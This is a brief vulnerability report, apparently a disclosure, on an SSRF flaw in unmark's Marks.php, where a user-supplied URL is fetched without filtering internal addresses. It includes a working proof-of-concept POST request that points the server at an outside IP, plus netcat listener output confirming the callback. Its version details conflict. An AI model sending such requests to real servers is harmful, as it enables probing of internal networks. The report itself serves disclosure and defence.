### Key Information #### Vulnerability Overview - **Vulnerability Type**: SSRF (Server-Side Request Forgery) - **Affected Software**: unmark v1.9.3 - **File**: application/controllers/Marks.php - **Version**: 2.8.0 #### Analysis - **Code Issue**: - Line 33: `$dom->loadHTMLFile($url, LIBXML_NOWARNING)` directly uses the user-provided `$url`. - Lines 25-28: Only checks if the URL starts with `http://` or `https://`, without filtering internal (private) addresses. - Lack of whitelist validation: No mechanism in the code to block or filter internal network addresses. #### POC (Proof of Concept) - **Request Example**: ```http POST /marks/add HTTP/1.1 Host: www.unmark17.top Referer: http://www.unmark17.top/marks Cookie: PHPSESSID=64fjgqk9lirca0w5yvihoupg20;think_lang=zh-cn Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Origin: http://www.unmark17.top User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:14.0) Gecko/20100101 Firefox/14.0 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Priority: u=0, Content-Length: 19 add_from_url=1&url=http://8.138.152.157:2333 ``` - **Response Example**: ```bash root@iZ23x40k8tI3z274a82dbzI:~# nc -lvp 2333 Listening on 0.0.0.0 2333 Connection received on 124.64.23.129 38457 GET / HTTP/1.1 Host: 8.138.152.157:2333 Connection: close ``` #### Summary This vulnerability allows attackers to access internal network resources by crafting malicious URLs, potentially leading to further security risks.